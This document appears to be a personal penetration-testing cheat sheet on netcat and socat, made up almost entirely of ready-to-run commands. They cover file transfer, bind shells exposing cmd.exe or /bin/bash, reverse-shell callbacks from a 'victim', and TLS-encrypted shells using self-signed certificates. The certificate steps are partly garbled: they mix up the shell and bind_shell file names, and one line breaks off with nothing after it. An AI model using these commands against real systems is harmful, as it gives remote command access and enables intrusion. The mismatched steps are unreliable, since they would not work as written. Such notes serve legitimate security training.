Netcat / Socat

Netcat

First on Windows (10.11.0.22):

nc -nlvp 4444 > incoming.exe

Then on Kali, push wget.exe:

nc -nv 10.11.0.22 4444 < /usr/share/windows/resources/binaries/wget.exe

On Windows:

nc -nlvp 4444 -e cmd.exe

On Kali:

nc -nv 10.11.0.22 4444

socat - TCP4:<target>:<target_port>

Bind (need sudo privilege for binding ports below 1024):

socat TCP4-LISTEN:<local_port> STDOUT

Transfer file from Kali (10.0.0.1) to Window (10.0.0.2):

socat TCP-LISTEN:443,fork file:file.txt

On Windows, to retrieve the file:

socat TCP4:10.0.0.1:443 file:file.txt,create

The listen will do:

socat -d -d TCP4-LISTEN:443 STDOUT

Then the target giving shell will do:

socat TCP4:10.0.0.2:443 EXEC:/bin/bash

First use openssl to create a self-signed cert:

openssl req -newkey rsa:2048 -nodes -keyout bind_shell.key -x509 -days 365 -out bind_shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem

Now the followings are generated:

On the listener, do:

socat OPENSSL-LISTEN:443,cert=bind_shell.pem,verify=0,fork EXEC:/bin/bash

To connect to the listener:

socat - OPENSSL:10.10.10.1:443,verify=0

First create ssl certificate:

openssl req -newkey rsa:2048 -nodes -keyout shell.key -x509 -days 365 -out shell.crt
cat bind_shell.key bind_shell.crt > bind_shell.pem

Add dhparames in the pem:

openssl dhparam -out dhparams.pem 2048
cat dhparams.pem >> shell.pem

Launch a socat listener:

socat -d -d OPENSSL-LISTEN:443,cert=shell.pem,verify=0 STDOUT

On the victim, do a callback using socat:

socat OPENSSL:<listener>:443,verify=0 EXEC:/bin/bash

To create a bind listener on Windows:

socat TCP4-LISTEN:443 EXEC:cmd.exe,pipes

You can use either nc or socat to connect:

nc -nv <windows_ip> 443
socat - TCP4:<windows_ip>:443

Last updated 4 years ago